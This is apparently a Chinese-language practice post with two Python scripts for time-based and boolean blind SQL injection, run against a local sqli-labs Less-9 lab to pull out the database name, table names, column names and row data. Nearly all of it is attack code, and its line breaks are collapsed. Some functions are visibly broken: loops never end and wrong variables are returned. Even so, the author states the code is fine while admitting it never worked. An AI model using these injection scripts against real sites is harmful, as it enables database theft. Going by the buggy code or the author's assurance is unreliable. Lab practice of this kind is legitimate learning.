sql：时间盲注和boolen盲注

关于时间盲注，boolen盲注的后面几个获取表、列、具体数据的函数补全

时间盲注方法

import time
import requests# 获取数据库名
def inject_database(url):dataname = ''for i in range(1, 20):low = 32high = 128mid = (low + high) // 2while low < high:payload = "1' and if(ascii(substr(database(), %d, 1)) > %d, sleep(3), 0)-- " % (i, mid)res = {"id": payload}start = time.time()r = requests.get(url, params=res)end = time.time()if end-start >= 3:low = mid + 1else:high = midmid = (low + high) // 2if mid == 32:breakdataname += chr(mid)print(dataname)# 获取表名
def table_inject(url, dataname):table_name = []index = 0while True:table_name = ""position = 1while True:low = 32high = 127while low < high:mid = (low + high) // 2payload = f"1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='{dataname}' limit {index}, 1), {position}, 1)) > {mid}, sleep(3), 0)-- "params = {"id": payload}start = time.time()r = requests.get(url, params=params)end = time.time()if end - start >= 3:low = mid + 1else:high = midif low == 32:breaktable_name += chr(low)position += 1# if not table_name:#     break# table_name.append(table_name)# index +=1return table_name# 获取列名
def colum_inject(url, dataname, table_name):colum_name = []index = 0while True:colum_name = ""position = 1while True:low = 32high = 127while low < high:mid = (low + high) // 2payload = f"1' and if(ascii(substr((select column_name from information_schema.columns where table_schema='{dataname}' and table_name='{table_name}' limit {index}, 1), {position}, 1)) > {mid}, sleep(3), 0)-- "params = {"id": payload}start = time.time()r = requests.get(url, params=params)end = time.time()if end-start >= 3:low = mid + 1else:high = midif low == 32:breakcolum_name += chr(low)position += 1return colum_name# 获取具体数据
def data_inject(url, dataname, table_name, colum_name):data = []index = 0while True:row_data = ""position = 1while True:low = 32high = 127while low < high:mid = (low + high) // 2payload = f"1' and if(ascii(substr((select {colum_name} from {dataname}.{table_name} limit {index}, 1), {position}, 1)) > {mid}, sleep(3), 0)-- "params = {"id": payload}start = time.time()r = requests.get(url, params=params)end = time.time()if end - start >= 3:low = mid + 1else:high = midif low == 32:breakrow_data += chr(low)position += 1return dataif __name__ == '__main__':url = 'http://127.0.0.1:8080/sqlilabs/Less-9/'dataname = inject_database(url)print(f"database: {dataname}")table_names = table_inject(url, dataname)print(f"table-name: {table_names}")if table_names:table_name = table_names[0]colum_names = colum_inject(url, dataname, table_name)print(f"colum-name: {colum_names}")if colum_names:colum_name = colum_names[0]data = data_inject(url, dataname, table_name, colum_name)print(f"时间盲注 - 具体数据: {data}")

布尔盲注方法

import requests# 通用的布尔盲注函数
def boolen_inject(url, payload, payloadfas, params):result = ""for pos in range(1, 20):for ascii_val in range(32, 127):payload_true = payload.format(pos, ascii_val)payload_false = payloadfas.format(pos, ascii_val)params_true = {params: payload_true}params_false = {params: payload_false}response_true = requests.get(url, params=params_true)response_false = requests.get(url, params=params_false)if response_true.text != response_false.text:result += chr(ascii_val + 1)breakelse:breakreturn result# 布尔盲注获取数据库名
def get_database_name(url, params):payload = "1' and ascii(substr(database(), {}, 1)) > {} -- "payloadfas = "1' and ascii(substr(database(), {}, 1)) <= {} -- "return boolen_inject(url, payload, payloadfas, params)# 布尔盲注获取表名
def table_inject(url, params, database_name):table_names = []index = 0while True:payload = (f"1' and ascii(substr((select table_name from information_schema.tables "f"where table_schema='{database_name}' limit {index}, 1), {{}}, 1)) > {{}} -- ")payloadfas = (f"1' and ascii(substr((select table_name from information_schema.tables "f"where table_schema='{database_name}' limit {index}, 1), {{}}, 1)) <= {{}} -- ")table_name = boolen_inject(url, payload, payloadfas, params)if not table_name:breaktable_names.append(table_name)index += 1return table_names# 布尔盲注获取列名
def column_inject(url, params, database_name, table_name):column_names = []index = 0while True:payload = (f"1' and ascii(substr((select column_name from information_schema.columns "f"where table_schema='{database_name}' and table_name='{table_name}' limit {index}, 1), {{}}, 1)) > {{}} -- ")payloadfas = (f"1' and ascii(substr((select column_name from information_schema.columns "f"where table_schema='{database_name}' and table_name='{table_name}' limit {index}, 1), {{}}, 1)) <= {{}} -- ")column_name = boolen_inject(url, payload, payloadfas, params)if not column_name:breakcolumn_names.append(column_name)index += 1return column_names# 布尔盲注获取具体数据
def data_inject(url, params, database_name, table_name, column_name):data = []index = 0while True:payload = (f"1' and ascii(substr((select {column_name} from {database_name}.{table_name} limit {index}, 1), {{}}, 1)) > {{}} -- ")payloadfas = (f"1' and ascii(substr((select {column_name} from {database_name}.{table_name} limit {index}, 1), {{}}, 1)) <= {{}} -- ")row_data = boolen_inject(url, payload, payloadfas, params)if not row_data:breakdata.append(row_data)index += 1return dataif __name__ == '__main__':url = "http://127.0.0.1:8080/sqlilabs/Less-9/index.php"params = "id"# 获取数据库名database_name = get_database_name(url, params)print(f"database_name: {database_name}")# 获取表名table_names = table_inject(url, params, database_name)print(f"table_name: {table_names}")if table_names:table_name = table_names[0]# 获取列名column_names = column_inject(url, params, database_name, table_name)print(f"column_name: {column_names}")if column_names:column_name = column_names[0]# 获取具体数据data = data_inject(url, params, database_name, table_name, column_name)print(f"data: {data}")

实验结论

但是两种方式都显示不了数据库名称，检查后发现是基础配置问题导致代码连接不上，正常在网址上进入是可以的。

代码本身没有问题。

现在我还没有找到问题所在，后面会抽时间改进。